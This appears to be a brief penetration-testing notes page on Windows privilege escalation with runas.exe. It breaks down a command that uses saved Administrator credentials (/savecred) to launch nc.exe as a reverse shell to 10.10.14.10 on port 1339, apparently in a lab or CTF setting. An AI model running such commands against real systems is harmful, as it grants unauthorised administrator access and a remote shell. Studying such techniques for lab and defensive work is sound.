RunAs
Overview
The RunAs command can be thought of as the sudo command in Linux. It allows you to run a command as someone else, aka the Administrator
Escalation via RunAs
Check for stored credentials
Execute a command as Administrator
Command Layout
C:\Windows\System32\runas.exe use runas.exe
/user:ACCESS\Administrator use user Administrator
/savescred use the saved credentials
"C:\Windows\System32\nc.exe to run nc.exe as Administrator
10.10.14.10 1339 and connect back to hackerman
Last updated
Was this helpful?